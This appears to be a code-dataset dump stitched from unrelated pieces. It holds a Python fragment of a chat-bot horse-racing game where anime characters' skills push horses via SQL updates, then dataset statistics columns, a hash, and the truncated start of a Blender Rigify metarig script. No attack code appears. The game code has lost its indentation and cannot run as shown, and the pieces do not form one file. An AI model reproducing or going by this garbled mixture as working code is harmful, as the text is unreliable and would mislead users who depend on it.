response = "%s号马%s的%s使用了【把你变成布丁呦】!向前冲了一步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 0, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "茜里":
response = "%s号马%s的%s使用了【甜蜜恶魔的声援】!魔法攻击上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
response += "自己向前冲了%s步\n" % move
position = min(10, horse[3] + move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, position = %s, satk = 8 where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "雪哥":
response = "%s号马%s的%s使用了【臣服在我的美之下吧】!其它角色的双防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - 1)
target_sdef = max(0, target_horse[8] - 1)
sql = "update horse set position = %s, def = %s, sdef = %s where id = %s" % (target_position, target_def, target_sdef, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "玲奈":
response = "%s号马%s的%s使用了【心碎】!造成了暴击!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
move = round(move * 1.5)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "香织":
response = "%s号马%s的%s使用了【琉球犬重拳出击】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 4
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "美美":
response = "%s号马%s的%s使用了【兔兔斩击】!攻击上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.search_horse_by_position(1)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
target_horse = await self.search_horse_by_position(2)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "铃":
response = "%s号马%s的%s使用了【尝尝亲手烘焙的红豆包】!自己的魔防上升了!自己的攻击上升了!向前冲了1步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 0, atk = 7, sdef = 8, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "惠鲤子":
response = "%s号马%s的%s使用了【致命惩罚】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
attack_fix = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
if move >= 2:
attack_fix = 4
response += '%s的攻击力大幅上升了!' % horse[1]
response += '\n'
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = atk + %s where id = %s" % (attack_fix, horse[0])
cursor.execute(sql)
elif horse[1] == "忍":
response = "%s号马%s的%s使用了【亡灵叙述者】!其它角色的物防下降了!自己的攻击上升了!双防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - 1)
sql = "update horse set position = %s, def = %s where id = %s" % (target_position, target_def, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 8, def = 5, sdef = 4 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "真阳":
response = "%s号马%s的%s使用了【伊丽莎白】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
damage_fix = -1
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s的奶牛鸽了\n" % horse[1]
else:
response += "奶牛把%s号马%s的%s击退了%s步。\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "栞":
response = "%s号马%s的%s使用了【附魔箭矢】!攻击力上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = atk + 1 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "千歌":
response = "%s号马%s的%s使用了【精灵庇护】!向前冲了一步!其它角色的物攻下降了!自己的魔攻上升了!自己的双防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
sql = "update horse set atk = atk - 1 where id = %s" % target_horse[0]
cursor.execute(sql)
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 0, position = %s, satk = 7, def = 4, sdef = 4 where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "空花":
response = "%s号马%s的%s使用了【神魂颠倒】!自己的双防上升了!向前冲了2步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
position = min(10, horse[3] + 2)
sql = "update horse set current_tp = 0, def = 5, sdef = 13, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "珠希":
response = "%s号马%s的%s使用了【猫猫决胜爪】!目标的tp减少了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
target_tp = target_horse[4]
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
target_tp = max(0, target_tp - 20)
if target_horse[6] > 0:
move = move * 2
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s, current_tp = %s where id = %s" % (target_position, target_tp, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "子龙":
response = "%s号马%s的%s使用了【飞跃枪闪】!自己的物防提升了!自己的物攻提升了!自己的tp上升提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = atk + 1, def = 8, tp = tp + 1 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "深月":
response = "%s号马%s的%s使用了【血色蔷薇】!其它角色的物防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
position_fix = 0
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
if move >= 2:
response += "自己向前冲了一步!\n"
position_fix += 1
target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - 2)
sql = "update horse set position = %s, def = %s where id = %s" % (target_position, target_def, target_horse[0])
cursor.execute(sql)
position = min(10, horse[3] + position_fix)
sql = "update horse set current_tp = 0, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "绫音":
response = "%s号马%s的%s使用了【噗吉全力挥动】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
if target_horse[0] != horse[0]:
response += "把%s号马%s的%s吹飞了一步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1])
move += 1
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "美里":
response = "%s号马%s的%s使用了【姐妹互助】!向前冲了一步!自己的魔攻上升了!自己的魔防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
sql = "update horse set atk = atk - 1 where id = %s" % target_horse[0]
cursor.execute(sql)
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 0, position = %s, satk = 8, def = 3, sdef = 5 where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "伊莉雅":
response = "%s号马%s的%s使用了【朱色之瞳】!自己的魔攻上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
horse_list = await self.search_horse()
for target_horse in horse_list:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, satk = 9 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "羊驼":
response = "%s号马%s的%s使用了【毛绒绒挥击】!自己的物防上升了!\n" % (
horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 6, def = 13, tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "美咲":
response = "%s号马%s的%s使用了【特洛伊之眼】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
target_horse = await self.get_single_target(horse)
target_tp = target_horse[4]
if target_horse[0] != horse[0]:
target_tp = max(0, target_tp - 20)
sql = "update horse set current_tp = %s where id = %s" % (target_tp, target_horse[0])
cursor.execute(sql)
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
damage_fix = -3
move = calculate_damage(horse[6], target_horse[8], damage_fix) \
+ calculate_damage(horse[6], target_horse[8], damage_fix) \
+ calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "香菜":
response = "%s号马%s的%s使用了【蔓藤旋舞】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
move_toxic = calculate_damage(5, target_horse[8], damage_fix)
if move + move_toxic == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步,毒退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move, move_toxic)
target_position = max(1, target_horse[3] - move - move_toxic)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "由加莉":
response = "%s号马%s的%s使用了【七重纱护】!自己的魔防上升了!tp中度恢复了!向前冲了1步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 40, sdef = 7, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "铃莓":
success = random.randint(1, 3)
response = "%s号马%s的%s使用了【狂风气流卷】!其它角色的物防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
if success == 1:
response += '大成功!伤害和减甲效果都得到了提升!\n'
damage_fix = 4
def_fix = 2
else:
response += '失败了……无事发生……\n'
damage_fix = 0
def_fix = 1
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - def_fix)
sql = "update horse set position = %s, def = %s where id = %s" % (target_position, target_def, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "依里":
response = "%s号马%s的%s使用了【闪电标枪】!退后了1步!自己的魔攻上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
damage_fix = 0
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
position = max(1, horse[3] - 1)
sql = "update horse set current_tp = 0, satk = 10, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "胡桃":
response = "%s号马%s的%s使用了【惊吓摇铃】!自己的双防提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
target_tp = target_horse[4]
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
target_tp = max(0, target_tp - 20)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s, current_tp = %s where id = %s" % (target_position, target_tp, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 5, sdef = 6 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "未奏希":
damage_fix = 0
response = "%s号马%s的%s使用了【捣蛋轰炸机】!自己的物攻上升了!其它角色的物攻下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s, atk = atk - 1 where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "怜":
damage_fix = 1
response = "%s号马%s的%s使用了【无敌斩】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
horse_num = len(horse_list)
for i in range(3):
target_id = random.randint(1, horse_num) - 1
target_horse = horse_list[target_id]
while target_horse[0] == horse[0]:
target_id = random.randint(1, horse_num) - 1
target_horse = horse_list[target_id]
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "日和莉":
response = "%s号马%s的%s使用了【日和突击】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
damage_fix = -3
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "优衣":
response = "%s号马%s的%s使用了【花瓣射击】!自己的物防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if target_horse[1] in ('真琴', '香织', '真步', '羊驼', '栞', '铃', '真阳', '珠希', '凯露', '日和莉'):
response += '对兽人造成了额外伤害!'
move += 1
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步。\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 3 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "佩可莉姆":
response = "%s号马%s的%s使用了【公主突袭】!自己的双防提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 3
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 6, sdef = 7 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "可可萝":
response = "%s号马%s的%s使用了【极光】!自己的物攻提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 0
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "凯露":
response = "%s号马%s的%s使用了【换头】!目标的双防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = list(await self.search_horse())
random.shuffle(horse_list)
change_horse = horse
for target_horse in horse_list:
if target_horse[0] != horse[0] and target_horse[3] >= change_horse[3]:
change_horse = target_horse
if change_horse[0] != horse[0]:
response += "和%s号马%s的%s换位了!\n" % (
change_horse[0], await get_nick_name(group_id, change_horse[2]), change_horse[1])
sql = "update horse set def = def - 1, sdef = sdef - 1, position = %s where id = %s" % (horse[3], change_horse[0])
cursor.execute(sql)
else:
response += "%s鸽了\n" % horse[1]
sql = "update horse set current_tp = 0, position = %s where id = %s" % (change_horse[3], horse[0])
cursor.execute(sql)
else:
response = "%s号马%s的%s使用了【白板ub】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(max(horse[6], horse[5]), target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
db.commit()
cursor.close()
db.close()
return response
| 53.89221
| 167
| 0.520833
| 7,555
| 59,497
| 3.92998
| 0.039709
| 0.153009
| 0.056987
| 0.057829
| 0.869051
| 0.85888
| 0.853929
| 0.84534
| 0.833081
| 0.824526
| 0
| 0.030338
| 0.352909
| 59,497
| 1,104
| 168
| 53.89221
| 0.740494
| 0
| 0
| 0.738889
| 0
| 0.012037
| 0.153712
| 0.025841
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001852
| false
| 0.000926
| 0.00463
| 0
| 0.023148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
221809e7a9e86b1ea6f5156df3a4a63147d41920
| 34,065
|
py
|
Python
|
blender/2.79/scripts/addons/rigify/metarigs/Basic/basic_human.py
|
uzairakbar/bpy2.79
|
3a3e0004ac6783c4e4b89d939e4432de99026a85
|
[
"MIT"
] | 2
|
2019-11-27T09:05:42.000Z
|
2020-02-20T01:25:23.000Z
|
rigify/metarigs/Basic/basic_human.py
|
1-MillionParanoidTterabytes/blender-addons-master
|
acc8fc23a38e6e89099c3e5079bea31ce85da06a
|
[
"Unlicense"
] | null | null | null |
rigify/metarigs/Basic/basic_human.py
|
1-MillionParanoidTterabytes/blender-addons-master
|
acc8fc23a38e6e89099c3e5079bea31ce85da06a
|
[
"Unlicense"
] | 4
|
2020-02-19T20:02:26.000Z
|
2022-02-11T18:47:56.000Z
|
import bpy
from mathutils import Color
def create(obj):
# generated by rigify.utils.write_metarig
bpy.ops.object.mode_set(mode='EDIT')
arm = obj.data
for i in range(6):
arm.rigify_colors.add()
arm.rigify_colors[0].name = "Root"
arm.rigify_colors[0].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[0].normal = Color((0.43529415130615234, 0.18431372940540314, 0.41568630933761597))
arm.rigify_colors[0].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[0].standard_colors_lock = True
arm.rigify_colors[1].name = "IK"
arm.rigify_colors[1].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[1].normal = Color((0.6039215922355652, 0.0, 0.0))
arm.rigify_colors[1].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[1].standard_colors_lock = True
arm.rigify_colors[2].name = "Special"
arm.rigify_colors[2].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[2].normal = Color((0.9568628072738647, 0.7882353663444519, 0.0470588281750679))
arm.rigify_colors[2].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[2].standard_colors_lock = True
arm.rigify_colors[3].name = "Tweak"
arm.rigify_colors[3].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[3].normal = Color((0.03921568766236305, 0.21176472306251526, 0.5803921818733215))
arm.rigify_colors[3].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[3].standard_colors_lock = True
arm.rigify_colors[4].name = "FK"
arm.rigify_colors[4].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[4].normal = Color((0.11764706671237946, 0.5686274766921997, 0.03529411926865578))
arm.rigify_colors[4].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[4].standard_colors_lock = True
arm.rigify_colors[5].name = "Extra"
arm.rigify_colors[5].active = Color((0.5490000247955322, 1.0, 1.0))
